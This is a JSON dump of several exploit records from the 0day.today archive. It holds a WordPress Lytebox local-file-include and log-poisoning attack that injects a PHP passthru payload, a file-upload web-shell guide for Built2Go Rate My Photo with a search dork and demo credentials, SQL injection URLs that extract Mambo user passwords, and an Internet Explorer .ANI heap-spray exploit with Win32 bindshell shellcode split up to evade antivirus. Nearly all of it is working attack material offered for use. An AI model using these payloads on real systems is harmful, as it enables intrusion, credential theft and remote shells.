Lytebox Local File Include and Remote Code Exe.\r\n\r\nDownload ; http://grupenet.com/wp-content/uploads/wp-lytebox.zip\r\n\r\nAuthor : TurkGuvenligi\r\n\r\nAgd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR\r\n\r\nLFI;\r\n\r\nhttp://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00\r\n\r\nRCE;\r\n\r\nopen cmd (cmd ac?yoruz)\r\n\r\nnc -vv 127.0.0.1 80 (connecting)\r\nGET /<?php passthru(\\$_GET[cmd]); ?> HTTP/1.0\r\nHost : www.target.com\r\n\r\nOur error is recorded and access_log :) yeah\r\n\r\nhttp://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]\r\n\r\naccess_log file ;\r\n\r\n\r\n../../../../../../../../../../etc/httpd/logs/error_log\r\n../../../../../../../../../../etc/httpd/logs/error.log\r\n../../../../../../../../../../etc/httpd/logs/access_log\r\n../../../../../../../../../../etc/httpd/logs/access.log\r\n../../../../../../../../../../var/log/apache/error_log\r\n../../../../../../../../../../var/log/apache/error.log\r\n../../../../../../../../../../var/log/apache/access_log\r\n../../../../../../../../../../var/log/apache/access.log\r\n../../../../../../../../../../var/log/apache2/error_log\r\n../../../../../../../../../../var/log/apache2/error.log\r\n../../../../../../../../../../var/log/apache2/access_log\r\n../../../../../../../../../../var/log/apache2/access.log\r\n../../../../../../../../../../var/www/logs/error_log\r\n../../../../../../../../../../var/www/logs/error.log\r\n../../../../../../../../../../var/www/logs/access_log\r\n../../../../../../../../../../var/www/logs/access.log\r\n../../../../../../../../../../usr/local/apache/logs/error_log\r\n../../../../../../../../../../usr/local/apache/logs/error.log\r\n../../../../../../../../../../usr/local/apache/logs/access_log\r\n../../../../../../../../../../usr/local/apache/logs/access.log\r\n../../../../../../../../../../var/log/error_log\r\n../../../../../../../../../../var/log/error.log\r\n../../../../../../../../../../var/log/access_log\r\n../../../../../../../../../../var/log/access.log\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5246"}, {"lastseen": "2018-01-05T15:11:12", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-01-02T00:00:00", "published": "2009-01-02T00:00:00", "id": "1337DAY-ID-4591", "href": "https://0day.today/exploit/description/4591", "type": "zdt", "title": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability", "sourceData": "==================================================================\r\nBuilt2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability\r\n==================================================================\r\n\r\n\r\n[~] Built2Go PHP Rate My Photo v1.46.4 RFU\r\n[~]\r\n[~]----------------------------------------------------------\r\n[~] Discovered By: ZoRLu \r\n[~]\r\n[~] Date: 22.11.2008\r\n[~]\r\n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (\r\n[~]\r\n[~] dork mu :) \"My Photo v1.46.4 \u00c2\u00a9 Big Resources\" ( for yahoo )\r\n[~]\r\n[~] onemli N0TT: arkadaslar hepimiz biliyoruz ki arama motoru yalnIzca google deil \r\n[~]\r\n[~] bide yahoo yu deneyin sonra hic site yok dersiniz xD\r\n[~]\r\n[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )\r\n[~] -----------------------------------------------------------\r\n\r\nfirst register to site \r\n\r\nyou add this code your shell to head \r\n\r\nGIF89a; \r\n\r\nexample your_shell.php:\r\n\r\nGIF89a;\r\n<?\r\n\r\n...\r\n\r\n...\r\n\r\n...\r\n\r\n?>\r\n\r\nand save your_sheell.php\r\n\r\nafter go member.php\r\n\r\nselect your shell.php and your shell here:\r\n\r\nhttp://z0rlu.blogspot.com/script/pictures/[id]shell.php\r\n\r\nexp:\r\n\r\ndemo:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/\r\n\r\nlogin:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/member.php\r\n\r\nuser: salla\r\n\r\npass: salla1\r\n\r\nshell:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4591"}, {"lastseen": "2018-02-14T00:43:30", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2008-01-31T00:00:00", "published": "2008-01-31T00:00:00", "id": "1337DAY-ID-2580", "href": "https://0day.today/exploit/description/2580", "type": "zdt", "title": "Mambo Component AkoGallery 2.5b SQL Injection Vulnerability", "sourceData": "===========================================================\r\nMambo Component AkoGallery 2.5b SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#########################################################################\r\n#\r\n#\r\n# joomla SQL Injection(com_akogallery)\r\n#\r\n#########################################################################\r\n#\r\n# DorKs 1 : allinurl: \"com_akogallery\"\r\n#\r\n########################################################################\r\nEXPLOIT :\r\n\r\nindex.php?option=com_akogallery&[email\u00a0protected]&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*\r\n\r\nindex.php?option=com_akogallery&[email\u00a0protected]&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*\r\n\r\n#########################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2580"}, {"lastseen": "2018-03-28T09:22:35", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2005-01-12T00:00:00", "published": "2005-01-12T00:00:00", "id": "1337DAY-ID-8500", "href": "https://0day.today/exploit/description/8500", "type": "zdt", "title": "MS Internet Explorer .ANI Remote Stack Overflow (0.2)", "sourceData": "=====================================================\r\nMS Internet Explorer .ANI Remote Stack Overflow (0.2)\r\n=====================================================\r\n\r\n<!-- Changed location of InternetExploiter3.2.ani to point to sploits directory /str0ke -->\r\n\r\n<HTML><!--\r\n________________________________________________________________________________\r\n\r\n ,sSSSs, Ss, Internet Exploiter 3 v0.2\r\n SS\" `YS' '*Ss. .ANI stackoverflow PoC exploit\r\n iS' ,SS\" Copyright (C) 2003, 2004 by Berend-Jan Wever.\r\n YS, .ss ,sY\" http://www.edup.tudelft.nl/~bjwever\r\n `\"YSSP\" sSS <[email\u00a0protected]>\r\n________________________________________________________________________________\r\n\r\n Credit for the vulnerability:\r\n Yuji Ukai for eEye Digital Security\r\n Patch:\r\n http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx\r\n Changelog for 3.2:\r\n - Putting the .ANI file in the HEAD sometimes caused the BoF to trigger\r\n before the heap was prepared, fixed that by putting it in the BODY.\r\n - New .ANI file overwrites the stack with a lot of 0x0D bytes, making sure\r\n it overwrites the return-address no matter where it is on the stack.\r\n This makes it OS/SP/language independ, thanks to spoonm for the details\r\n on the .ANI file format.\r\n\r\n This program is free software; you can redistribute it and/or modify it under\r\n the terms of the GNU General Public License version 2, 1991 as published by\r\n the Free Software Foundation.\r\n\r\n This program is distributed in the hope that it will be useful, but WITHOUT\r\n ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\r\n FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\r\n details.\r\n\r\n A copy of the GNU General Public License can be found at:\r\n http://www.gnu.org/licenses/gpl.html\r\n or you can write to:\r\n Free Software Foundation, Inc.\r\n 59 Temple Place - Suite 330\r\n Boston, MA 02111-1307\r\n USA.\r\n-->\r\n <SCRIPT language=\"javascript\">\r\n // Win32 MSIE exploit helper script, creates a lot of nopslides to land in\r\n // and/or use as return address. Thanks to blazde for feedback and idears.\r\n\r\n // 4 nops because the 0x0D slide has 5 byte instructions.\r\n shellcode = unescape(\"%u3737%u3737\" +\r\n // Win32 bindshell (port 28876, '\\0' free, looping). Thanks to\r\n // HDM and others for inspiration and borrowed code. Source:\r\n // www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c\r\n // (Added the \"+\"-s to fool Norton AV, it would see the\r\n // shellcode as InternetExploiter 1)\r\n \"%u43eb\"+\"%u5756\"+\"%u458b\"+\"%u8b3c\"+\"%u0554\"+\"%u0178\"+\"%u52ea\" +\r\n \"%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf\" +\r\n \"%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b\" +\r\n \"%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64\" +\r\n \"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850\" +\r\n \"%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff\" +\r\n \"%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22\" +\r\n \"%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6\" +\r\n \"%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe\" +\r\n \"%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031\" +\r\n \"%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56\" +\r\n \"%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964\" +\r\n \"%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353\" +\r\n \"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343\" +\r\n \"%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031\" +\r\n \"%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b\" +\r\n \"%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\r\n // Nopslide will contain these bytes:\r\n bigblock = unescape(\"%u0D0D%u0D0D\");\r\n // Heap blocks in IE have 20 dwords as header\r\n headersize = 20;\r\n // This is all very 1337 code to create a nopslide that will fit exactly\r\n // between the the header and the shellcode in the heap blocks we want.\r\n // The heap blocks are 0x40000 dwords big, I can't be arsed to write good\r\n // documentation for this.\r\n slackspace = headersize+shellcode.length\r\n while (bigblock.length<slackspace) bigblock+=bigblock;\r\n fillblock = bigblock.substring(0, slackspace);\r\n block = bigblock.substring(0, bigblock.length-slackspace);\r\n while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n // And now we can create the heap blocks, we'll create 700 of them to spray\r\n // enough memory to be sure enough that we've got one at 0x0D0D0D0D\r\n memory = new Array();\r\n for (i=0;i<700;i++) memory[i] = block + shellcode;\r\n\r\n function failed() {\r\n // You can't lose with this exploit.\r\n document.location.href=\"http://www.margrieta.com\";\r\n }\r\n </SCRIPT>\r\n <BODY style=\"CURSOR: url('sploits/InternetExploiter3.2.ani')\" onload=\"setTimeout(failed, 1000);\">\r\n </BODY>\r\n</HTML>\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8500"}]}
